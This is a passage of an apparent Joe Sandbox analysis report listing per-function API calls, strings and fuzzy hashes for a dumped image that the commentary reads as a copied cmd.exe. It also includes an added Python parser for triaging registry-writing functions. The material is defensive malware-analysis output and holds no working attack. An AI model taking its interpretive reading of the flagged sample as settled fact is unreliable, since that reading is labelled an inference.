                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF083
                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF092
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF0A5
                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7CD4AF0DB
                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF135
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF16C
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF185
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,?,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                        • String ID: <noalias>$CMD.EXE
                                        • API String ID: 1161012917-1690691951
                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction ID: 4e3c0843de50850b4fe100313f1512b8d9d8aa4f9707322f8eeeaf3b5cd027c3
                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction Fuzzy Hash: 43919321B0DA529AFB04BF61D8040BDBAA1AF59B74F844135EF2E526D5FF3CA6458330
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                        • String ID: \\?\
                                        • API String ID: 628682198-4282027825
                                        • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction ID: 29c55dba9c3ca7ba56b6056841f8851fa4b075222ca748d6f365c69e6b3eef11
                                        • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction Fuzzy Hash: 6EE1A321B0C682D6EB60AF25D8446F9A3A1EB547A8F844136DF6E87794FF3CE645C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$BufferConsoleInfoScreen
                                        • String ID:
                                        • API String ID: 1034426908-0
                                        • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction ID: ab4046b07d295918f6f0631b6a6f7e8c16e93d6b0522bb4766014d40d45811ed
                                        • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction Fuzzy Hash: E9F1A532B0C68289EB64EF21D8902E9B7A5FF457A8F844135DF6D87695EF38E604C710
                                        APIs
                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAA85
                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAACF
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAAEC
                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB39
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB6F
                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABA4
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABCB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue$CreateOpen
                                        • String ID: %s=%s
                                        • API String ID: 1019019434-1087296587
                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction ID: f007e954e358e46a7d53308fe7ab0e7ccf58a36e443dc75a377490044dfa2c28
                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction Fuzzy Hash: 31519431B0CB4296E760AF65E44576AF6A2FB897A0F808235CF6D83791EF38D5418710
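                                         The function records in this part of the report are Joe Sandbox's per-function output for the image dumped from process 00000006 at 00007FF7CD480000 (every block names the same Source File). The string literals attached to them (CMD.EXE, <noalias>, cd $chdir $md $mkdir $pushd $rd $rmdir, DPATH, the .COM;.EXE;.BAT;.CMD;... extension list, FOR/IF/REM) are the literals of cmd.exe's own command interpreter, so the console, heap, path and token-parsing functions here are best read as the copied cmd.exe flagged in the signature list rather than as attacker-written code; that reading is an interpretation of the strings, not something the report states. What a practitioner wants from several hundred such blocks is a filter: which functions make state-changing calls (the single block above with RegCreateKeyExW, RegSetValueExW, RegDeleteKeyExW, RegDeleteValueW and the string %s=%s), plus an overall inventory of which API sets the dumped image touches, to compare against the report's registry and file activity sections. The parser below is an added example, not Joe Sandbox code or report output; its input is a constructed two-record sample written in the shape of these blocks, and parse_entries, registry_writers and api_inventory are names chosen here.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Similarity blocks)
and pull out the few worth a manual look. Added example, not Joe Sandbox code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the shape of the function records above (two records,
# "Associated:" lines omitted); it is not a live report download.
SAMPLE = """\
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAACF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB39
Strings
Memory Dump Source
• Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• Instruction Fuzzy Hash: 31519431B0CB4296E760AF65E44576AF6A2FB897A0F808235CF6D83791EF38D5418710
APIs
• _wcsupr.MSVCRT ref: 00007FF7CD4AEF33
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD4AEFDC
  • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?), ref: 00007FF7CD4901D6
Strings
Memory Dump Source
• Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
Similarity
• API ID: Console$Mode$Handle
• String ID: <noalias>$CMD.EXE
• Instruction Fuzzy Hash: 43919321B0DA529AFB04BF61D8040BDBAA1AF59B74F844135EF2E526D5FF3CA6458330
"""

# One "Name.MODULE(args), ref: ADDR" line; the args and the subcall prefix are optional.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\([^)]*\),)? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Registry APIs that change state; reads (RegOpenKeyExW, RegQueryValueExW) are left out on purpose.
REGISTRY_WRITE = {"RegCreateKeyExW", "RegSetValueExW", "RegDeleteKeyExW", "RegDeleteValueW"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                          # call-site address inside the dump
    subcall_of: Optional[int] = None  # set when Joe attributes the call to a callee


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""
    source_file: str = ""


def parse_entries(text: str) -> list[FunctionEntry]:
    """Split the listing on its 'APIs' headers and fill one FunctionEntry per record."""
    entries: list[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    section = ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            section = "APIs"
            continue
        if cur is None or not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub = int(m["sub"], 16) if m["sub"] else None
                cur.apis.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), sub))
        elif line.startswith("API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("String ID:"):
            # Joe joins a function's string literals with '$'.
            cur.strings = [s.strip() for s in line.split(":", 1)[1].split("$") if s.strip()]
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
        elif line.startswith("Source File:"):
            cur.source_file = line.split(":", 1)[1].split(",")[0].strip()
    return entries


def registry_writers(entries: list[FunctionEntry]) -> list[FunctionEntry]:
    """Functions that themselves (not via a subcall) call a registry-modifying API."""
    return [e for e in entries
            if REGISTRY_WRITE & {a.name for a in e.apis if a.subcall_of is None}]


def api_inventory(entries: list[FunctionEntry]) -> dict[str, set[str]]:
    """Module -> set of API names seen anywhere in the listing (an import-like summary)."""
    inv: dict[str, set[str]] = {}
    for e in entries:
        for a in e.apis:
            inv.setdefault(a.module, set()).add(a.name)
    return inv


if __name__ == "__main__":
    found = parse_entries(SAMPLE)
    for e in registry_writers(found):
        print(f"registry writer {e.fuzzy_hash[:16]}... apis={[a.name for a in e.apis]} strings={e.strings}")
    for mod, names in sorted(api_inventory(found).items()):
        print(f"{mod}: {sorted(names)}")
```

                                         Feed it the report's function listing saved as plain text (the blocks from "APIs" through "Instruction Fuzzy Hash"). "Part of subcall function" lines are kept but marked with the callee address, so registry_writers counts only direct calls; compare its output with the report's registry activity section, and use api_inventory to see at a glance whether the dumped image reaches beyond the console, heap, file and registry sets that cmd.exe itself needs.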
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$FullNamePathwcsrchr
                                        • String ID:
                                        • API String ID: 4289998964-0
                                        • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction ID: 885a15515db1fc1cf5403e128357c2e0dcc0e3501cf21938d8f32ac7cc322c9e
                                        • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction Fuzzy Hash: A7C1E511B0E35682EE94BF52958837AA3A1FB54BA0F846534CF2E477D0FF3CA6519320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 2081463915-1994581435
                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction ID: 716967c7789859c82151f0da52f2a43000094e8ab4d65bb4dd624694a8f11cbd
                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction Fuzzy Hash: 5C718E20F0D64385FBA4BF65A858679A6A0AF517B4FC40539DF2D866D0FF3DE6818320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$iswspacewcschr
                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                        • API String ID: 840959033-3627297882
                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction ID: 0e766ec1bde537315bd42960f145fc138c41d00b1f24689f8505c9d1c53c77cc
                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction Fuzzy Hash: 2FD15C31B0C64386FA50BF62E8196B8B7A6AF54B64FC44035DF2D46299FE3CE6058730
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD493602
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4832F3
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7CD4832A4), ref: 00007FF7CD483309
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD483384
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A11DF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Similarity
                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                        • String ID:
                                        • API String ID: 611521582-0
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: CreateFile_open_osfhandle
                                        • String ID: con
                                        • API String ID: 2905481843-4257191772
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                        • String ID: CSVFS$NTFS$REFS
                                        • API String ID: 3510147486-2605508654
                                        APIs
                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7CD487279,?,?,?,?,?,00007FF7CD48BFA9), ref: 00007FF7CD4A4485
                                        Strings
                                        Similarity
                                        • API ID: longjmp
                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                        • API String ID: 1832741078-366822981
                                        APIs
                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD496677
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD49668F
                                        • _errno.MSVCRT ref: 00007FF7CD4966A3
                                        • wcstol.MSVCRT ref: 00007FF7CD4966C4
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966E4
                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966FE
                                        Strings
                                        Similarity
                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                        • API String ID: 2348642995-441775793
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: Heap$_wcsicmp$AllocProcess
                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                        • API String ID: 3223794493-3086019870
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                        • String ID: %s$/-.$:
                                        • API String ID: 1644023181-879152773
                                        APIs
                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD4A7251), ref: 00007FF7CD4A628E
                                        Strings
                                        Similarity
                                        • API ID: ObjectSingleWait
                                        • String ID: wil
                                        • API String ID: 24740636-1589926490
                                        APIs
                                        Similarity
                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                        • String ID:
                                        • API String ID: 1397130798-0
                                        APIs
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • iswspace.MSVCRT ref: 00007FF7CD497EEE
                                        Strings
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: A
                                        • API String ID: 3731854180-3554254475
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: Enum$Openwcsrchr
                                        • String ID: %s=%s$.$\Shell\Open\Command
                                        • API String ID: 3402383852-1459555574
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1BA
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F1E7
                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1FF
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F2BB
                                        Strings
                                        Similarity
                                        • API ID: iswdigit$iswspacewcschr
                                        • String ID: )$=,;
                                        • API String ID: 1959970872-2167043656
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                        • String ID: %04X-%04X$:
                                        • API String ID: 930873262-1938371929
                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction ID: 605c9909c0d798856cc884d61a1ebd0fb24614ba40a70aa1788e081a40a54bd4
                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction Fuzzy Hash: ED416121B0CA82D2E760AF65E4542BAF2A1FB85764FC04136DF6E426D5EF3CE645C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 3249344982-2616576482
